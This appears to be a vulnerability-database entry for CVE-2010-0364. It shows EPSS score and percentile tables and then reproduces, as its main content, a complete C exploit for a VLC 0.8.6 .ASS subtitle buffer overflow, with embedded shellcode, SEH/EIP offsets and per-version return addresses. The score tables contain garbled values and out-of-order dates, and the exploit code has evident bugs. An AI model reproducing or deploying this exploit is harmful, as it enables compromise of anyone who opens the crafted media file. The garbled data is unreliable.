CVE-2010-0364 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	7.44%	–	–
2022-04-03	–	–	7.44%	–	–
2023-02-26	–	–	7.44%	–	–
2023-03-12	–	–	–	21.67%	–
2023-03-26	–	–	–	17.85%	–
2023-06-25	–	–	–	15.88%	–
2023-08-06	–	–	–	15%	–
2023-09-17	–	–	–	12.55%	–
2024-06-02	–	–	–	11.5%	–
2024-06-09	–	–	–	–	–
2024-06-09	–	–	–	8.46%	–
2024-08-11	–	–	–	8.46%	–
2024-12-22	–	–	–	8.46%	–
2025-02-16	–	–	–	8.46%	–
2025-01-19	–	–	–	8.46%	–
2025-02-16	–	–	–	8.46%	–
2025-03-18	–	–	–	–	6.86%
2025-03-30	–	–	–	–	6.86%
2025-04-06	–	–	–	–	6.86%
2025-04-06	–	–	–	–	6.86,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	81%
2022-04-03	92%
2023-02-26	93%
2023-03-12	96%
2023-03-26	95%
2023-06-25	95%
2023-08-06	95%
2023-09-17	95%
2024-06-02	95%
2024-06-09	94%
2024-06-09	94%
2024-08-11	95%
2024-12-22	94%
2025-02-16	95%
2025-01-19	94%
2025-02-16	95%
2025-03-18	91%
2025-03-30	9%
2025-04-06	91%
2025-04-06	91%

/*[%]VLC vs 0.6.8 [b][c][d][a] .ASS file buffer overflow exploit(win32 universal) [%]Works every time,works on any win32 OS,tested on Windows xp sp2. [%]My doctor said that I have seriuouse problems ,but I think he's full of it because the voices tell me I'm ok!*/ #include<stdio.h> #include<string.h> #include<stdint.h> #define File "subtitle666.ass" #define OGGfile "openme.ogg" #define IF(x,NULL) if(x==NULL) #define FOR(i,a,b) for(i=a;i<b;++i) #define WHILE(z) while(z>0) #define is_bigendian() ((*(char*)&i)==0) #define EIP_OFFSET 163852 #define SEH_OFFSET 165248 #define NEXTSEH_OFFSET 165244 /*-------------prototypes---------*/ //100% working shellcode char vlcshellcode[]= { "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3d" "\xba\xb1\xd9\x83\xeb\xfc\xe2\xf4\xc1\x52\xf5\xd9\x3d\xba\x3a\x9c" "\x01\x31\xcd\xdc\x45\xbb\x5e\x52\x72\xa2\x3a\x86\x1d\xbb\x5a\x90" "\xb6\x8e\x3a\xd8\xd3\x8b\x71\x40\x91\x3e\x71\xad\x3a\x7b\x7b\xd4" "\x3c\x78\x5a\x2d\x06\xee\x95\xdd\x48\x5f\x3a\x86\x19\xbb\x5a\xbf" "\xb6\xb6\xfa\x52\x62\xa6\xb0\x32\xb6\xa6\x3a\xd8\xd6\x33\xed\xfd" "\x39\x79\x80\x19\x59\x31\xf1\xe9\xb8\x7a\xc9\xd5\xb6\xfa\xbd\x52" "\x4d\xa6\x1c\x52\x55\xb2\x5a\xd0\xb6\x3a\x01\xd9\x3d\xba\x3a\xb1" "\x01\xe5\x80\x2f\x5d\xec\x38\x21\xbe\x7a\xca\x89\x55\xc4\x69\x3b" "\x4e\xd2\x29\x27\xb7\xb4\xe6\x26\xda\xd9\xd0\xb5\x5e\xba\xb1\xd9" }; char data[]= { "[Script Info]\n" "; Script generated by Aegisub\n" "; http://www.aegisub.net\n" "Title: Neon Genesis Evangelion - Episode 26 (neutral Spanish)\n" "Original Script: RoRo\n" "Script Updated By: version 2.8.01\n" "ScriptType: v4.00+\n" "Collisions: Normal\n" "PlayResY: 600\n" "PlayDepth: 0\n" "Timer: 100,0000\n" "Video Aspect Ratio: 0\n" "Video Zoom: 6\n" "Video Position: 0\n" "[V4+ Styles]\n" "Format: Name, Fontname, Fontsize, PrimaryColour, SecondaryColour, OutlineColour, BackColour, Bold, Italic, Underline, StrikeOut, ScaleX, ScaleY, Spacing, Angle, BorderStyle, Outline, Shadow, Alignment, MarginL, MarginR, MarginV, Encoding\n" "Style: DefaultVCD, Arial,28,&H00B4FCFC,&H00B4FCFC,&H00000008,&H80000008,-1,0,0,0,100,100,0.00,0.00,1,1.00,2.00,2,30,30,30,0\n" "[Events]\n" "Format: Layer, Start, End, Style, Name, MarginL, MarginR, MarginV, Effect, Text\n" "Dialogue:" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" //165254 junk bytes to cause exception }; char banner[]= { "******************************************************************\n" " VLC 0.6.8x Buffer overflow exploit(win32 universal) *\n" " *\n" " by fl0 fl0w *\n" "******************************************************************\n" }; char arguments[]= { "---------------------------\n" "Too few args! \n" "sploit.exe [target 1/2/3/4]\n" "---------------------------\n" }; // data + 165254 nop + shellcode + szJMP(strcat) /*--------extern variables----------*/ char b[1000000]; char c[1000000]; char d[1000000]; char f[1000000]; //1402 bytes nop char seh[]="\x87\x75\x40\x4B"; char nseh[]="\x38\xFA\x74\x02"; int i; int input; char bf[4]; int t; /*-------prototypes----------*/ int buildF(); int cpy(unsigned int,char*); void print(char*); void gen_random(char*, const int); unsigned int getFsize(FILE*,char*); int cpystr(char* dest,int,int); int oggf(char* fname); int Targetprint(); /*--------ogg file format---------*/ typedef struct aa { //28 bytes or 224 bits uint32_t Cp; // Capture pattern &#65533; 32 bits uint8_t Ver; // Version &#65533; 8 bits uint8_t H; // Header type &#65533; 8 bits uint64_t Gp; // Granule position &#65533; 64 bits uint32_t Bsn; // Bitstream serial number &#65533; 32 bits uint32_t Psn; // Page sequence number &#65533; 32 bits uint32_t C; // Checksum &#65533; 32 bits uint8_t Ps; // Page segments &#65533; 8 bits uint8_t St; // Segment table 8 bit }ogg; /*------targets------------*/ struct { unsigned int eip; char* etype; }RET[]= { { 0x026DFA38, "VLC 0.8.6 c" }, { 0x0263FA38, "VLC 0.8.6 b,d" }, { 0x0267FA38, "VLC 0.8.6 a" }, { 0x0267FA38, "VLC 0.8.6 b test1" }, { 0x02B6FA38, "VLC 0.8.6 RC1" }, { NULL,NULL } }; /*------main--------*/ int main(int argc,char* argv[]) { if(argc<2) { system("CLS"); printf("%s%s",banner,arguments); Targetprint();exit(0); } input=atoi(argv[1]); switch(input) { case 0: reverseInt(RET[0].eip); cpy(RET[0].eip,bf); break; case 1: reverseInt(RET[1].eip); cpy(RET[1].eip,bf); break; case 2: reverseInt(RET[2].eip); cpy(RET[2].eip,bf); break; case 3: reverseInt(RET[3].eip); cpy(RET[3].eip,bf); break; case 4: reverseInt(RET[4].eip); cpy(RET[4].eip,bf); break; } printf("[!]Using : %s retaddress\n",RET[input].etype); buildF(b); oggf(OGGfile); getchar(); return 0; } int buildF(unsigned int retn) { FILE *f=fopen(File,"wb"); IF(f,NULL) { print("File .ass error!"); exit(0);} gen_random(b,165267); /*EIP offset 165267 bytes [EIP][NOP nopoffset=164667 bytes][SHELLCODE nopoffset+nrbytes nop]*/ memcpy(b+EIP_OFFSET,bf,4); memset(b+EIP_OFFSET+4,0x90,10); memcpy(b+EIP_OFFSET+4+10,vlcshellcode,strlen(vlcshellcode)); fprintf(f,"%s%s",data,b); free(data); fclose(f); printf("[#]ASS file DONE!\n",getFsize(f,File)); return 0; } int oggf(char* fname) { FILE* g=fopen(fname,"wb"); IF(g,NULL) { print("File ogg error"); exit(0); } ogg *W666; W666=(ogg*)malloc(sizeof(ogg)); W666->Cp=0x5367674F; W666->Ver=0x00; W666->H=0x02; W666->Gp=0x00000000; W666->Bsn=0x000060B8; W666->Psn=0x00000000; W666->C=0xA403D2F8; W666->Ps=0x01; W666->St=0x1E; fwrite(W666,sizeof(W666),9,g); fclose(g); printf("[#]OGG file DONE!\n",getFsize(g,OGGfile)); return 0; } int cpy(unsigned int source,char* dest) { int len; len=4; memcpy(dest,&source,len+1); return len; } void print(char* msg) { printf("[*]%s\n",msg); } void gen_random(char *s, const int len) { static const char alphanum[] ="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; FOR(i,0,len) { s[i]=alphanum[rand()%(sizeof(alphanum)-1)]; } s[len]=0; } unsigned int getFsize(FILE* g,char* gname) { unsigned int s; g=fopen(gname,"rb"); IF(g,NULL) { print("File error at reading"); exit(0); } fseek(g,0,SEEK_END); s=ftell(g); return s; } int reverseInt(unsigned int i) { unsigned char c1, c2, c3, c4; if(is_bigendian()) { return i; }else { c1=i&255; c2=(i>>8)&255; c3=(i>>16)&255; c4=(i>>24)&255; return((int)c1<<24)+((int)c2<<16)+((int)c3<<8)+c4; } } int cpystr(char* dest,int str,int len) { memset(dest,str,len+1); return len; } int Targetprint() { print("Targets are:"); for(t=0;t<5;t++) printf("[!]%s - [0x%d] - %d\n",RET[t].etype,RET[t].eip,t); }